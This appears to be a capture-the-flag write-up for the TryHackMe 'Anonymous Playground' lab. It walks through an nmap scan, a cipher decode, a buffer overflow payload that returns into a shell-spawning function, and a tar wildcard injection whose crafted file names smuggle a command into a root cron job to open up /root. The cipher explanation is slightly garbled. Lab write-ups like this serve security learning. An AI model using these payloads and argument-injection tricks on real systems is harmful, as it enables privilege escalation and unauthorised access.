Anonymous Playground: THM writeup

Nmap Scan

PORT   STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 60:b6:ad:4c:3e:f9:d2:ec:8b:cd:3b:45:a5:ac:5f:83 (RSA)
| 256 6f:9a:be:df:fc:95:a2:31:8f:db:e5:a2:da:8a:0c:3c (ECDSA)
|_ 256 e6:98:52:49:cf:f2:b8:65:d7:41:1c:83:2e:94:24:88 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_/zYdHuAKjP
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Proving Grounds
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
HomePage
Operatives.php
hE = m
zA = a
dC = g
fH = n
zA = a
The cipher looks like :
final = ord(second_character)-64+ord(first_character)
#If character lies above "z" in ascii table thenif final > ord("z"):
final = (final%ord("z"))+ord("a")-1
chr(final)
  • First, convert the ASCII of the second character to alphabetic number
    i.e 'A': 1
    'B' : 2 ....
  • Add this to ASCII of the second character and find the resulting character.
  • If the resulting character is higher than the ASCII value of z then higher value is to be added to the ASCII value of a
magna :: <Password>

Inside the system

main function decompiled using ghidra.
call_bash function decompiled using ghidra.

Buffer overflow

$ python -c "print 'A'*72+'\x57\x06\x40\x00\x00\x00\x00\x00'" | ./hacktheworld
$ python -c "print 'A'*72+'\x57\x06\x40\x00\x00\x00\x00\x00'" > ro
#Store the exploit is a file
$ gdb ./hacktheworld # run gdb
(gdb) break call_bash # set breakpoint call_bash function
(gdb) run < ro # run the program with the input from ro
Starting program: /home/magna/hacktheworld < ro
Breakpoint 1, 0x000000000040065b in call_bash ()
(gdb) c
Continuing.
Who do you want to hack?
We are Anonymous.
We are Legion.
We do not forgive.
We do not forget.
[Message corrupted]...Well...done.
Breakpoint 2, 0x00000000004006d0 in call_bash ()
# we are hitting the second breakpoint
(gdb) s
Single stepping until exit from function call_bash,
which has no line number information.
__libc_system (line=0x400803 "/bin/sh") at ../sysdeps/posix/system.c:180
180 ../sysdeps/posix/system.c: No such file or directory.
(gdb)
$ (python -c "print 'A'*72+'\x57\x06\x40\x00\x00\x00\x00\x00'"; cat)  | ./hacktheworld
$ (python -c "print 'A'*72+'\x57\x06\x40\x00\x00\x00\x00\x00\x57\x06\x40\x00\x00\x00\x00\x00'"; cat)  | ./hacktheworld
*/1 *   * * *   root    cd /home/spooky && tar -zcf /var/backups/spooky.tgz *
$ echo "ro" > "--checkpoint=1"
$ echo "ro" > "--checkpoint-action=exec=sh ro.sh"
$ echo "chmod 777 /root" > ro.sh

--

--

--

Infosec Enthusiast

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

How I was able to send SMS from target and get their OTP.

NEW KUBERNETES SECURITY ALERT: Vulnerabilities Enable Denial of Service on kubelet and API Server

OpenSwap — $IDIA Staking Campaign Explainer

Ola Finance on Fuse Network suffers $3.6 million hack

How DeFiHelper Keeps Your Funds Safe

Sin City’s Select

IoT security: Held hostage by supply chain insecurity

Leveraging Security Automation to Merge CrowdStrike, Okta and Active Directory into a Single…

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Roshan Guragain

Roshan Guragain

Infosec Enthusiast

More from Medium

Paper - HackTheBox [Writeup]

Vulnhub — Tr0ll 2 Writeup

TryHackMe — Pickle Rick

nmap -sS <IP> — min-rate=1000